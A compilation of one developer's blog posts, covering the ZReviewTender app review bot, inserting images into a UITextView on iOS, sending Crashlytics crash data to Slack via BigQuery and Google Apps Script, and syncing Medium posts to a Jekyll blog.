processReviews(reviews, platform): after fetching new reviews, this function will be called to let the Processor handle them; please return the resulting reviews after processing.
The Review data structure is defined in `lib/Models/Review.rb` (note that the territory parameter holds the territory for Apple and the language for Android).
If a Processor is not needed, you can set `enable: false` or directly remove that Processor's config block.
**Processors execution order can be adjusted according to your needs:**
e.g. execute Filter first, then Translation, then Slack, then Log to Google Sheet...

### Execution

> ⚠️ Use Gem to directly run `ZReviewTender`; if it's a manual deployment project, please use `bundle exec ruby bin/ZReviewTender` to execute.

#### Generate configuration files:

```bash
ZReviewTender -i
```
Generate apple.yml & android.yml from apple.example.yml & android.example.yml to the config/
directory in the current execution directory.
```bash
ZReviewTender -r
```
Runs the review check using the `apple.yml` & `android.yml` settings under `/config/`.
```bash
ZReviewTender --run=configuration file directory
```
Same as above, but reads the `apple.yml` & `android.yml` settings from the specified configuration file directory.
```bash
ZReviewTender -a
```
Runs only the Apple check using the `apple.yml` settings under `/config/`.
```bash
ZReviewTender --apple=apple.yml configuration file location
```
```bash
ZReviewTender -g
```
Runs only the Android check using the `android.yml` settings under `/config/`.
```bash
ZReviewTender --googleAndroid=android.yml configuration file location
```
```bash
ZReviewTender -d
```
This deletes the Timestamp record files in `/latestCheckTimestamp`, returning to the initial state; re-running the scraping will produce the init success message again.
```bash
ZReviewTender -v
```
Displays the latest version number of ZReviewTender on RubyGem.
```bash
ZReviewTender -n
```
The first successful execution will send an initialization success message to the specified Slack Channel and generate latestCheckTimestamp/Apple
and latestCheckTimestamp/Android
files in the corresponding execution directory to record the last scraped review Timestamp.
Additionally, an execute.log
will be generated to record execution errors.
Set up a schedule (using crontab) to continuously scrape new reviews. ZReviewTender will scrape new reviews from the last scraped review Timestamp recorded in latestCheckTimestamp
to the current scraping time and update the Timestamp record file.
e.g. crontab: 15 */6 * * * ZReviewTender -r
Additionally, note that since the Android API only provides reviews added or edited in the last 7 days, the schedule cycle should not exceed 7 days to avoid missing reviews.
https://developers.google.com/android-publisher/reply-to-reviews#retrieving_a_set_of_reviews
ZReviewTender App Reviews Automatic Bot
```yaml
name: ZReviewTender
on:
  workflow_dispatch:
  schedule:
    - cron: "15 */6 * * *" # Runs every six hours, you can refer to the above crontab to change the settings

jobs:
  ZReviewTender:
    runs-on: ubuntu-latest
    steps:
      - name: ZReviewTender Automatic Bot
        uses: ZhgChgLi/ZReviewTender@main
        with:
          command: '-r' # Executes the Apple & Android App review check, you can refer to the above to change to other execution commands
```
Be sure to ensure that your configuration files and keys cannot be publicly accessed, as the sensitive information within them could lead to App/Slack permissions being stolen; the author is not responsible for any misuse.
If any unexpected errors occur, please create an Issue with the log information, and it will be fixed as soon as possible!
The tutorial ends here, next is the behind-the-scenes development story.
=========================
I thought last year’s summary of AppStore APP’s Reviews Slack Bot and the related technology implementation of ZReviewsBot — Slack App Review Notification Bot would conclude the integration of the latest App reviews into the company’s workflow; unexpectedly, Apple updated the App Store Connect API this year, allowing this matter to continue evolving.
Last year’s solution for fetching Apple iOS/macOS App reviews:
Following last year’s method, only the second method can be used, but the effect is not perfect; the session will expire, requiring manual periodic updates, and cannot be placed on the CI/CD server because the session will expire immediately if the IP changes.
important-note-about-session-duration by Fastlane
After receiving the news that Apple updated the App Store Connect API this year, I immediately started redesigning the new review bot. In addition to using the official API, I also optimized the previous architecture design and became more familiar with Ruby usage.
It's very strange, so I had to work around it by first hitting this endpoint to filter out the latest reviews, then hitting List All App Store Versions for an App & List All Customer Reviews for an App Store Version to combine the App version information.
```ruby
require "jwt"
require "time"
require "json"
require "net/http"
require "openssl"

payload = {
  iss: "client_email field in the GCP API service account key (*.json) file",
  sub: "client_email field in the GCP API service account key (*.json) file",
  scope: ["https://www.googleapis.com/auth/androidpublisher"].join(' '),
  aud: "token_uri field in the GCP API service account key (*.json) file",
  iat: Time.now.to_i,
  exp: Time.now.to_i + 60*20
}

rsa_private = OpenSSL::PKey::RSA.new("private_key field in the GCP API service account key (*.json) file")
token = JWT.encode payload, rsa_private, 'RS256', header_fields = {kid: "private_key_id field in the GCP API service account key (*.json) file", typ: "JWT"}

uri = URI("token_uri field in the GCP API service account key (*.json) file")
https = Net::HTTP.new(uri.host, uri.port)
https.use_ssl = true
request = Net::HTTP::Post.new(uri)
request.body = "grant_type=urn%3Aietf%3Aparams%3Aoauth%3Agrant-type%3Ajwt-bearer&assertion=#{token}"

response = https.request(request).read_body
result = JSON.parse(response) # parse the OAuth token response

bearer = result["access_token"]

### use bearer token

uri = URI("https://androidpublisher.googleapis.com/androidpublisher/v3/applications/APP_PACKAGE_NAME/reviews")
https = Net::HTTP.new(uri.host, uri.port)
https.use_ssl = true

request = Net::HTTP::Get.new(uri)
request['Authorization'] = "Bearer #{bearer}"

response = https.request(request).read_body

result = JSON.parse(response)

# success!
```
If you have any questions or suggestions, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Practical Route
The app has a discussion area where users can post articles. The interface for posting articles needs to support text input, inserting multiple images, and text wrapping with images.
What? You say Chapter One? Isn’t it just using UITextView to achieve the editor functionality, why does it need to be divided into “chapters”? Yes, that was my initial reaction too, until I started working on it and realized it wasn’t that simple. It troubled me for two weeks, searching through various resources both domestic and international before finding a solution. Let me narrate my journey…
If you want to know the final solution directly, please skip to the last chapter (scroll down down down down).
Of course, the text editor uses the UITextView component. Looking at the documentation, UITextView’s attributedText comes with an NSTextAttachment object that can attach images to achieve text wrapping effects. The code is also very simple:
```swift
let imageAttachment = NSTextAttachment()
imageAttachment.image = UIImage(named: "example")
self.contentTextView.attributedText = NSAttributedString(attachment: imageAttachment)
```
At first, I was quite happy thinking it was simple and convenient; but the problems were just beginning:
```swift
let range = self.contentTextView.selectedRange.location // current cursor position (character index)
let combination = NSMutableAttributedString(attributedString: self.contentTextView.attributedText) // Get current content
combination.insert(NSAttributedString(attachment: imageAttachment), at: range)
self.contentTextView.attributedText = combination // Write back
```
```swift
class UploadImageNSTextAttachment: NSTextAttachment {
    var uuid: String?
}
```
When uploading an image, change to:
```swift
let id = UUID().uuidString
let attachment = UploadImageNSTextAttachment()
attachment.uuid = id
```
Once we can identify the corresponding NSTextAttachment, we can search for the NSTextAttachment in the attributedText for the failed upload image, find it, and replace it with an error icon or remove it directly.
```swift
if let content = self.contentTextView.attributedText {
    content.enumerateAttributes(in: NSMakeRange(0, content.length), options: NSAttributedString.EnumerationOptions(rawValue: 0)) { (object, range, stop) in
        if object.keys.contains(NSAttributedStringKey.attachment) {
            if let attachment = object[NSAttributedStringKey.attachment] as? UploadImageNSTextAttachment, attachment.uuid == "targetID" {
                attachment.bounds = CGRect(x: 0, y: 0, width: 30, height: 30)
                attachment.image = UIImage(named: "IconError")
                let combination = NSMutableAttributedString(attributedString: content)
                combination.replaceCharacters(in: range, with: NSAttributedString(attachment: attachment))
                // To remove directly, use deleteCharacters(in: range)
                self.contentTextView.attributedText = combination
            }
        }
    }
}
```
After overcoming the above problem, the code will look like this:
class UploadImageNSTextAttachment:NSTextAttachment {
+ var uuid:String?
+}
+func dismissPhotoPicker(withTLPHAssets: [TLPHAsset]) {
+ // TLPhotoPicker image picker callback
+
+ let range = self.contentTextView.selectedRange.location ?? NSRange(location: 0, length: 0)
+ // Get the cursor position, if none, start from the beginning
+
+ guard withTLPHAssets.count > 0 else {
+ return
+ }
+
+ DispatchQueue.global().async { in
+ // Process in the background
+ let orderWithTLPHAssets = withTLPHAssets.sorted(by: { $0.selectedOrder > $1.selectedOrder })
+ orderWithTLPHAssets.forEach { (obj) in
+ if var image = obj.fullResolutionImage {
+
+ let id = UUID().uuidString
+
+ var maxWidth:CGFloat = 1500
+ var size = image.size
+ if size.width > maxWidth {
+ size.width = maxWidth
+ size.height = (maxWidth/image.size.width) * size.height
+ }
+ image = image.resizeTo(scaledToSize: size)
+ // Resize image
+
+ let attachment = UploadImageNSTextAttachment()
+ attachment.bounds = CGRect(x: 0, y: 0, width: size.width, height: size.height)
+ attachment.uuid = id
+
+ DispatchQueue.main.async {
+ // Switch back to the main thread to update the UI and insert the image
+ let combination = NSMutableAttributedString(attributedString: self.contentTextView.attributedText)
+ attachments.forEach({ (attachment) in
+ combination.insert(NSAttributedString(string: "\n"), at: range)
+ combination.insert(NSAttributedString(attachment: attachment), at: range)
+ combination.insert(NSAttributedString(string: "\n"), at: range)
+ })
+ self.contentTextView.attributedText = combination
+
+ }
+
+ // Upload image to server
+ // Alamofire post or....
+ // POST image
+ // if failed {
+ if let content = self.contentTextView.attributedText {
+ content.enumerateAttributes(in: NSMakeRange(0, content.length), options: NSAttributedString.EnumerationOptions(rawValue: 0)) { (object, range, stop) in
+
+ if object.keys.contains(NSAttributedStringKey.attachment) {
+ if let attachment = object[NSAttributedStringKey.attachment] as? UploadImageNSTextAttachment,attachment.uuid == obj.key {
+
+ // REPLACE:
+ attachment.bounds = CGRect(x: 0, y: 0, width: 30, height: 30)
+ attachment.image = // ERROR Image
+ let combination = NSMutableAttributedString(attributedString: content)
+ combination.replaceCharacters(in: range, with: NSAttributedString(attachment: attachment))
+ // OR DELETE:
+ // combination.deleteCharacters(in: range)
+
+ self.contentTextView.attributedText = combination
+ }
+ }
+ }
+ }
+ //}
+ //
+
+ }
+ }
+ }
+}
+
By now, most of the issues have been resolved. So, what troubled me for two weeks?
Answer: “Memory” issues
iPhone 6 can’t handle it!
When inserting more than 5 images using the above method, UITextView starts to lag; at a certain point, the app crashes due to memory overload.
p.s. Tried various compression/other storage methods, but the result was the same.
The suspected reason is that UITextView does not reuse NSTextAttachment for images, so all inserted images are loaded into memory and not released. Unless you’re inserting small images like emojis 😅, you can’t use it for text wrapping around images.
After discovering this “hard” memory issue, I continued searching online for solutions and found the following alternatives:
1. Embed an HTML file in a WebView (a `<div contentEditable="true"></div>` block) and interact with the WebView using JS.
2. Use UITableView combined with UITextView.

The first method of embedding an HTML file in a WebView was not considered due to performance and user experience concerns. Interested friends can search for related solutions on GitHub (e.g., RichTextDemo).
The second method of using UITableView combined with UITextView:
I implemented about 70% of it. Specifically, each line is a Cell, with two types of Cells: one for UITextView and one for UIImageView, with one line for text and one line for images. The content must be stored in an array to avoid disappearing during reuse.
This method solves the memory issue nicely through cell reuse, but I eventually gave up because the editing behavior was very hard to control: pressing Return at the end of a line should create a new line and move the cursor into it, and pressing Backspace at the beginning of a line should jump to the previous line (and delete the current line if it's empty).
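For reference, below is a rough sketch of that UITableView-based approach (hypothetical cell identifiers and types, not the code that actually shipped): each content block is one row, backed by an array model so nothing disappears on cell reuse.

```swift
import UIKit

// Rough sketch of the UITableView + UITextView approach. "TextCell" / "ImageCell"
// are assumed prototype cells registered in the storyboard, each with a
// UITextView / UIImageView at viewWithTag(1).
enum EditorBlock {
    case text(String)
    case image(UIImage)
}

final class ComposerViewController: UITableViewController {
    private var blocks: [EditorBlock] = [.text("")]

    override func tableView(_ tableView: UITableView, numberOfRowsInSection section: Int) -> Int {
        return blocks.count
    }

    override func tableView(_ tableView: UITableView, cellForRowAt indexPath: IndexPath) -> UITableViewCell {
        switch blocks[indexPath.row] {
        case .text(let string):
            let cell = tableView.dequeueReusableCell(withIdentifier: "TextCell", for: indexPath)
            (cell.viewWithTag(1) as? UITextView)?.text = string // restore from the model on reuse
            return cell
        case .image(let image):
            let cell = tableView.dequeueReusableCell(withIdentifier: "ImageCell", for: indexPath)
            (cell.viewWithTag(1) as? UIImageView)?.image = image // reuse keeps memory bounded
            return cell
        }
    }
}
```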
Interested friends can refer to: MMRichTextEdit.
By this point, a lot of time had been spent, and the development schedule was severely delayed. The final solution was to use TextKit.
Here are two articles for friends interested in researching further:
However, there is a certain learning curve, which was too difficult for a novice like me. Moreover, time was running out, so I aimlessly searched GitHub for solutions.
Finally, I found XLYTextKitExtension, which can be directly imported and used.
✔ Allows NSTextAttachment to support custom UIViews, enabling any interactive operations.
✔ NSTextAttachment can be reused without exhausting memory.
The specific implementation is similar to Chapter 1, except that NSTextAttachment is replaced with XLYTextAttachment.
For the UITextView to be used:
```swift
contentTextView.setUseXLYLayoutManager()
```
Tip 1: Change the insertion of NSTextAttachment to:
```swift
let combine = NSMutableAttributedString(attributedString: NSAttributedString(string: ""))
let imageView = UIView() // your custom view
let imageAttachment = XLYTextAttachment { () -> UIView in
    return imageView
}
imageAttachment.id = id
imageAttachment.bounds = CGRect(x: 0, y: 0, width: size.width, height: size.height)
combine.append(NSAttributedString(attachment: imageAttachment))
self.contentTextView.textStorage.insert(combine, at: range)
```
Tip 2: The way to search for an NSTextAttachment changes to:
```swift
self.contentTextView.textStorage.enumerateAttribute(NSAttributedStringKey.attachment, in: NSRange(location: 0, length: self.contentTextView.textStorage.length), options: []) { (value, range, stop) in
    if let attachment = value as? XLYTextAttachment {
        //attachment.id
    }
}
```
Tip 3: Deleting an NSTextAttachment item changes to:
```swift
self.contentTextView.textStorage.deleteCharacters(in: range)
```
Tip 4: Get the current content length
```swift
self.contentTextView.textStorage.length
```
Tip 5: Refresh the Bounds size of the Attachment
The main reason is for user experience; when inserting an image, I will first insert a loading image, and the inserted image will be replaced after being compressed in the background. The Bounds of the TextAttachment need to be updated to the resized size.
```swift
self.contentTextView.textStorage.addAttributes([:], range: range)
```
(Add empty attributes to trigger refresh)
Tip 6: Convert input content into transmittable text
Use Tip 2 to search all input content and extract the IDs of the found Attachments, combining them into a format like [ [ID] ] for transmission.
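A minimal sketch of Tip 6 (illustrative only; it assumes the `id` string assigned in Tip 1 and the `[[image_id=...]]` placeholder format used in Tip 8):

```swift
import UIKit
// plus the XLYTextKitExtension import for XLYTextAttachment

// Walk the textStorage and replace every attachment with a [[image_id=ID]] placeholder,
// keeping the plain text in between, so the content can be sent to the server as a string.
func transmittableText(from textStorage: NSTextStorage) -> String {
    var result = ""
    let fullRange = NSRange(location: 0, length: textStorage.length)
    textStorage.enumerateAttribute(.attachment, in: fullRange, options: []) { value, range, _ in
        if let attachment = value as? XLYTextAttachment {
            result += "[[image_id=\(attachment.id ?? "")]]" // `id` set when inserting (Tip 1)
        } else {
            result += (textStorage.string as NSString).substring(with: range)
        }
    }
    return result
}
```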
Tip 7: Content replacement
```swift
self.contentTextView.textStorage.replaceCharacters(in: range, with: NSAttributedString(attachment: newImageAttachment))
```
Tip 8: Use regular expressions to match the range of content
```swift
let pattern = "(\\[\\[image_id=){1}([0-9]+){1}(\\]\\]){1}"
let textStorage = self.contentTextView.textStorage

if let regex = try? NSRegularExpression(pattern: pattern, options: .caseInsensitive) {
    while true {
        let range = NSRange(location: 0, length: textStorage.length)
        if let match = regex.matches(in: textStorage.string, options: .withTransparentBounds, range: range).first {
            let matchString = textStorage.attributedSubstring(from: match.range)
            //FINDED!
        } else {
            break
        }
    }
}
```
Note: If you need to search & replace items, you need to use a While loop. Otherwise, when there are multiple search results, after finding and replacing the first one, the range of the subsequent search results will be incorrect, causing a crash.
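For example, a hedged sketch of that search-and-replace loop (meant to live inside the same view controller as the snippets above); `attachmentFor(_:)` is a hypothetical lookup from the matched placeholder to the attachment that should replace it:

```swift
// Always re-run the regex against the current textStorage: every replacement shifts
// the ranges of later matches, so cached match ranges would be wrong and could crash.
let pattern = "(\\[\\[image_id=){1}([0-9]+){1}(\\]\\]){1}"
let textStorage = self.contentTextView.textStorage

if let regex = try? NSRegularExpression(pattern: pattern, options: .caseInsensitive) {
    while true {
        let fullRange = NSRange(location: 0, length: textStorage.length)
        guard let match = regex.matches(in: textStorage.string, options: .withTransparentBounds, range: fullRange).first else {
            break
        }
        let placeholder = textStorage.attributedSubstring(from: match.range).string
        let attachment = attachmentFor(placeholder) // hypothetical: map placeholder -> attachment
        textStorage.replaceCharacters(in: match.range, with: NSAttributedString(attachment: attachment))
    }
}
```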
Currently, I have completed the product using this method and it is online without any issues; I will explore the principles behind it when I have time!
This article is more of a personal problem-solving experience sharing rather than a tutorial; if you are implementing similar functionality, I hope it helps you. Feel free to contact me with any questions or feedback.
The first official post on Medium
Feel free to contact me with any questions or feedback.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Integrating Crashlytics and Big Query to automatically forward crash records to a Slack Channel
Pinkoi iOS Team Real Photo
First, let’s look at the results. We query Crashlytics crash records regularly every week; filter out the top 10 issues with the most crashes; and send the information to a Slack Channel, making it convenient for all iOS teammates to quickly understand the current stability.
For app developers, the Crash-Free Rate can be said to be the most important metric; the data represents the proportion of app users who did not encounter crashes. I think every app would hope its Crash-Free Rate ~= 99.9%; but the reality is that it’s impossible. As long as there is code, there can be bugs, not to mention some crashes are caused by underlying issues (Apple) or third-party SDKs. Additionally, the DAU (Daily Active Users) volume can also impact the Crash-Free Rate. The higher the DAU, the more likely it is to encounter many sporadic crash issues.
Since a 100% crash-free app does not exist, tracking and handling crashes becomes very important. Besides the most common Google Firebase Crashlytics (formerly Fabric), there are other options like Bugsnag and Bugfender. I haven’t compared these tools personally, so interested friends can research on their own. If you use other tools, the content introduced in this article won’t be applicable.
The benefits of choosing Crashlytics are:
Side note: It is not recommended to build a formal service entirely on Firebase, as the charges can become very expensive once the traffic increases… it’s a trap.
Crashlytics also has many drawbacks:
The most painful part is the poor support and flexibility of Integrations, coupled with the lack of an API to write scripts to connect crash data. This means you have to manually check Crashlytics for crash records from time to time to track crash issues.
The content and rules of the above Integrations cannot be customized.
Initially, we directly used 2. New Fatal Issue to Slack or Email, and for Email, we used Google Apps Script to trigger subsequent processing scripts; however, this notification would bombard the notification channel crazily, because it would notify for any issue, big or small, or even sporadic crashes caused by user devices or iOS itself. As DAU increased, we were bombarded by these notifications every day, and only about 10% of them were truly valuable, related to our program errors, and encountered by many users.
As a result, it did not solve the problem of Crashlytics being difficult to track automatically, and we still had to spend a lot of time reviewing whether the issue was important.
After searching around, this is the only method we found, and the only one officially provided; this is the trap under the free candy coating. I suspect neither Crashlytics nor Analytics Events will ever offer an API for querying data directly, because the only official suggestion is to export the data to BigQuery, and BigQuery charges for storage and queries beyond the free quota.
Storage: The first 10 GB per month is free.
Query: The first 1 TB per month is free. (The query quota means how much data is processed when you run a Select query)
For details, refer to Big Query pricing.
The setup details for Crashlytics to Big Query can be found in the official documentation, which requires enabling GCP services, binding a credit card, etc.
After setting up the Crashlytics Log to Big Query import cycle and completing the first import with data, we can start querying the data.
First, go to Firebase Project -> Crashlytics -> Click the “•••” in the top right corner of the list -> Click “BigQuery dataset”.
After going to GCP -> Big Query, you can select “firebase_crashlytics” in the left “Explorer” -> select your Table name -> “Detail” -> You can view the Table information on the right, including the latest modification time, used capacity, storage period, etc.
Make sure there is imported data available for querying.
You can switch to the “SCHEMA” tab at the top to view the Table’s column information or refer to the official documentation.
Click the “Query” button in the top right to open an interface with an assisted SQL Builder (if you are not familiar with SQL, it is recommended to use this):
Or directly click “COMPOSE NEW QUERY” to open a blank Query Editor:
Regardless of the method, it is the same text editor; after entering the SQL, you can automatically complete the SQL syntax check and estimate the query quota cost in the top right (This query will process XXX when run.
):
After confirming the query, click “RUN” in the top left to execute the query, and the results will be displayed in the Query results section below.
⚠️ Pressing “RUN” to execute the query will accumulate the query quota and incur charges; so please be careful not to run queries recklessly.
1. Count the number of crashes per day for the past 30 days:
```sql
SELECT
  COUNT(DISTINCT event_id) AS number_of_crashes,
  FORMAT_TIMESTAMP("%F", event_timestamp) AS date_of_crashes
FROM
  `yourProjectID.firebase_crashlytics.yourTableName`
GROUP BY
  date_of_crashes
ORDER BY
  date_of_crashes DESC
LIMIT 30;
```
2. Query the top 10 most frequent crashes in the past 7 days:
```sql
SELECT
  DISTINCT issue_id,
  COUNT(DISTINCT event_id) AS number_of_crashes,
  COUNT(DISTINCT installation_uuid) AS number_of_impacted_user,
  blame_frame.file,
  blame_frame.line
FROM
  `yourProjectID.firebase_crashlytics.yourTableName`
WHERE
  event_timestamp >= TIMESTAMP_SUB(CURRENT_TIMESTAMP(), INTERVAL 168 HOUR)
  AND event_timestamp < CURRENT_TIMESTAMP()
GROUP BY
  issue_id,
  blame_frame.file,
  blame_frame.line
ORDER BY
  number_of_crashes DESC
LIMIT 10;
```
However, the data retrieved using this official example is sorted differently from what you see in Crashlytics. This is likely because it groups by blame_frame.file (nullable) and blame_frame.line (nullable).
3. Query the top 10 devices with the most crashes in the past 7 days:
```sql
SELECT
  device.model,
  COUNT(DISTINCT event_id) AS number_of_crashes
FROM
  `yourProjectID.firebase_crashlytics.yourTableName`
WHERE
  event_timestamp >= TIMESTAMP_SUB(CURRENT_TIMESTAMP(), INTERVAL 168 HOUR)
  AND event_timestamp < CURRENT_TIMESTAMP()
GROUP BY
  device.model
ORDER BY
  number_of_crashes DESC
LIMIT 10;
```
For more examples, please refer to the official documentation.
If your SQL query returns no data, first ensure that the Crashlytics data for the specified conditions has been imported into Big Query (for example, the default SQL example queries the crash records of the day, but the data might not have been synchronized yet, so no results are found); if there is data, then check whether the filter conditions are correct.
Here, we modify the official example from point 2. We want the results to match the crash issues and sorting data we see on the first page of Crashlytics.
Top 10 crash issues in the past 7 days:
```sql
SELECT
  DISTINCT issue_id,
  issue_title,
  issue_subtitle,
  COUNT(DISTINCT event_id) AS number_of_crashes,
  COUNT(DISTINCT installation_uuid) AS number_of_impacted_user
FROM
  `yourProjectID.firebase_crashlytics.yourTableName`
WHERE
  is_fatal = true
  AND event_timestamp >= TIMESTAMP_SUB(
    CURRENT_TIMESTAMP(),
    INTERVAL 7 DAY
  )
GROUP BY
  issue_id,
  issue_title,
  issue_subtitle
ORDER BY
  number_of_crashes DESC
LIMIT
  10;
```
Comparison of Crashlytics’ Top 10 crash issues results, matched ✅.
Go to Google Apps Script homepage -> Log in with the same account as Big Query -> Click “New Project” in the upper left corner, and you can rename the project after opening a new project.
Refer to the official documentation example, and bring in the above Query SQL.
function queryiOSTop10Crashes() {
+ var request = {
+ query: 'SELECT DISTINCT issue_id, issue_title, issue_subtitle, COUNT(DISTINCT event_id) AS number_of_crashes, COUNT(DISTINCT installation_uuid) AS number_of_impacted_user FROM `firebase_crashlytics.YourTableName` WHERE is_fatal = true AND event_timestamp >= TIMESTAMP_SUB( CURRENT_TIMESTAMP(), INTERVAL 7 DAY ) GROUP BY issue_id, issue_title, issue_subtitle ORDER BY number_of_crashes DESC LIMIT 10;',
+ useLegacySql: false
+ };
+ var queryResults = BigQuery.Jobs.query(request, 'YourProjectID');
+ var jobId = queryResults.jobReference.jobId;
+
+ // Check on status of the Query Job.
+ var sleepTimeMs = 500;
+ while (!queryResults.jobComplete) {
+ Utilities.sleep(sleepTimeMs);
+ sleepTimeMs *= 2;
+ queryResults = BigQuery.Jobs.getQueryResults(projectId, jobId);
+ }
+
+ // Get all the rows of results.
+ var rows = queryResults.rows;
+ while (queryResults.pageToken) {
+ queryResults = BigQuery.Jobs.getQueryResults(projectId, jobId, {
+ pageToken: queryResults.pageToken
+ });
+ Logger.log(queryResults.rows);
+ rows = rows.concat(queryResults.rows);
+ }
+
+ var data = new Array(rows.length);
+ for (var i = 0; i < rows.length; i++) {
+ var cols = rows[i].f;
+ data[i] = new Array(cols.length);
+ for (var j = 0; j < cols.length; j++) {
+ data[i][j] = cols[j].v;
+ }
+ }
+
+ return data
+}
+
query: this parameter can be replaced with any Query SQL you have written.
The structure of the returned object is as follows:
[
+ [
+ "67583e77da3b9b9d3bd8feffeb13c8d0",
+ "<compiler-generated> line 2147483647",
+ "specialized @nonobjc NSAttributedString.init(data:options:documentAttributes:)",
+ "417",
+ "355"
+ ],
+ [
+ "a590d76bc71fd2f88132845af5455c12",
+ "libnetwork.dylib",
+ "nw_endpoint_flow_copy_path",
+ "259",
+ "207"
+ ],
+ [
+ "d7c3b750c3e5587c91119c72f9f6514d",
+ "libnetwork.dylib",
+ "nw_endpoint_flow_copy_path",
+ "138",
+ "118"
+ ],
+ [
+ "5bab14b8f8b88c296354cd2e",
+ "CoreFoundation",
+ "-[NSCache init]",
+ "131",
+ "117"
+ ],
+ [
+ "c6ce52f4771294f9abaefe5c596b3433",
+ "XXX.m line 975",
+ "-[XXXX scrollToMessageBottom]",
+ "85",
+ "57"
+ ],
+ [
+ "712765cb58d97d253ec9cc3f4b579fe1",
+ "<compiler-generated> line 2147483647",
+ "XXXXX.heightForRow(at:tableViewWidth:)",
+ "67",
+ "66"
+ ],
+ [
+ "3ccd93daaefe80f024cc8a7d0dc20f76",
+ "<compiler-generated> line 2147483647",
+ "XXXX.tableView(_:cellForRowAt:)",
+ "59",
+ "59"
+ ],
+ [
+ "f31a6d464301980a41367b8d14f880a3",
+ "XXXX.m line 46",
+ "-[XXXX XXX:XXXX:]",
+ "50",
+ "41"
+ ],
+ [
+ "c149e1dfccecff848d551b501caf41cc",
+ "XXXX.m line 554",
+ "-[XXXX tableView:didSelectRowAtIndexPath:]",
+ "48",
+ "47"
+ ],
+ [
+ "609e79f399b1e6727222a8dc75474788",
+ "Pinkoi",
+ "specialized JSONDecoder.decode<A>(_:from:)",
+ "47",
+ "38"
+ ]
+]
+
You can see it is a two-dimensional array.
Continue adding the new function below the above code.
function sendTop10CrashToSlack() {
+
+ var iOSTop10Crashes = queryiOSTop10Crashes();
+ var top10Tasks = new Array();
+
+ for (var i = 0; i < iOSTop10Crashes.length ; i++) {
+ var issue_id = iOSTop10Crashes[i][0];
+ var issue_title = iOSTop10Crashes[i][1];
+ var issue_subtitle = iOSTop10Crashes[i][2];
+ var number_of_crashes = iOSTop10Crashes[i][3];
+ var number_of_impacted_user = iOSTop10Crashes[i][4];
+
+ var strip_title = issue_title.replace(/[\<|\>]/g, '');
+ var strip_subtitle = issue_subtitle.replace(/[\<|\>]/g, '');
+
+ top10Tasks.push("<https://console.firebase.google.com/u/1/project/YOUR_FIREBASE_PROJECTID/crashlytics/app/YOUR_FIREBASE_APP_PROJECT_ID/issues/"+issue_id+"|"+(i+1)+". Crash: "+number_of_crashes+" times ("+number_of_impacted_user+" users) - "+strip_title+" "+strip_subtitle+">");
+ }
+
+ var messages = top10Tasks.join("\n");
+ var payload = {
+ "blocks": [
+ {
+ "type": "header",
+ "text": {
+ "type": "plain_text",
+ "text": ":bug::bug::bug: iOS Top 10 Crashes in the Last 7 Days :bug::bug::bug:",
+ "emoji": true
+ }
+ },
+ {
+ "type": "divider"
+ },
+ {
+ "type": "section",
+ "text": {
+ "type": "mrkdwn",
+ "text": messages
+ }
+ },
+ {
+ "type": "divider"
+ },
+ {
+ "type": "actions",
+ "elements": [
+ {
+ "type": "button",
+ "text": {
+ "type": "plain_text",
+ "text": "View Last 7 Days in Crashlytics",
+ "emoji": true
+ },
+ "url": "https://console.firebase.google.com/u/1/project/YOUR_FIREBASE_PROJECTID/crashlytics/app/YOUR_FIREBASE_APP_PROJECT_ID/issues?time=last-seven-days&state=open&type=crash&tag=all"
+ },
+ {
+ "type": "button",
+ "text": {
+ "type": "plain_text",
+ "text": "View Last 30 Days in Crashlytics",
+ "emoji": true
+ },
+ "url": "https://console.firebase.google.com/u/1/project/YOUR_FIREBASE_PROJECTID/crashlytics/app/YOUR_FIREBASE_APP_PROJECT_ID/issues?time=last-thirty-days&state=open&type=crash&tag=all"
+ }
+ ]
+ },
+ {
+ "type": "context",
+ "elements": [
+ {
+ "type": "plain_text",
+ "text": "Crash counts and versions are only counted for the last 7 days, not all data.",
+ "emoji": true
+ }
+ ]
+ }
+ ]
+ };
+
+ var slackWebHookURL = "https://hooks.slack.com/services/XXXXX"; //Replace with your in-coming webhook URL
+ UrlFetchApp.fetch(slackWebHookURL,{
+ method : 'post',
+ contentType : 'application/json',
+ payload : JSON.stringify(payload)
+ })
+}
+
If you don’t know how to obtain the incoming WebHook URL, you can refer to the “Obtaining Incoming WebHooks App URL” section in this article.
At this point, your Google Apps Script project should have the above two functions.
Next, please select the “sendTop10CrashToSlack” function at the top, and then click Debug or Run to execute a test run; since the first execution requires authentication, please execute it at least once before proceeding to the next step.
After successfully executing a test run, you can start setting up the schedule for automatic execution:
Select the clock icon on the left, then choose “+ Add Trigger” at the bottom right.
For the first “Choose which function to run” (entry point of the function to be executed), change it to sendTop10CrashToSlack
. The time period can be set according to personal preference.
⚠️⚠️⚠️ Please be aware that each query will accumulate and incur charges, so do not set it up carelessly; otherwise, you might end up bankrupt due to automatic scheduling.
Example Result Image
From now on, you can quickly track the current app crash issues on Slack; you can even discuss them directly there.
If you want to track the App Crash-Free Users Rate, you can refer to the next article “Crashlytics + Google Analytics Automatic Query for App Crash-Free Users Rate”
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Move your Medium posts to a Jekyll blog and keep them in sync in the future.
This tool can help you move your Medium posts to a Jekyll blog and keep them in sync in the future.
It will automatically download your posts from Medium, convert them to Markdown, and upload them to your repository, check out my blog for online demo zhgchg.li .
One-time setting, Lifetime enjoying❤️
Powered by ZMediumToMarkdown .
If you only want to create a backup or auto-sync of your Medium posts, you can use the GitHub Action directly by following the instructions in this Wiki .
1. Click the "Use this template" button located above and select "Create a new repository".
2. Name the repository `YOUR_USERNAME.github.io`; for example, my organization name is zhgchgli, so it becomes `zhgchgli.github.io`.
3. Select the `public` repository option, and then click on "Create repository from template".
4. Enable workflow permissions by going to the `Settings` tab in your GitHub repository, selecting `Actions` -> `General`, finding the "Workflow permissions" section, selecting "Read and write permissions", and clicking `Save` to save the changes.

*If you choose a different Repository Name, the GitHub page will be `https://username.github.io/Repository Name` instead of `https://username.github.io/`, and you will need to fill in the `baseurl` field in `_config.yml` with your Repository Name.
*If you are using an organization and cannot enable `Read and write permissions` in the repository settings, please refer to the organization settings page and enable it there.

5. Complete the settings in the `_zmediumtomarkdown.yml` file.
6. Wait for the `Automatic Build` and `pages-build-deployment` GitHub actions to finish before making any further changes.
7. Manually run the sync once by going to the `Actions` tab in your GitHub repository, selecting the `ZMediumToMarkdown` action, clicking the `Run workflow` button, and selecting the `main` branch.
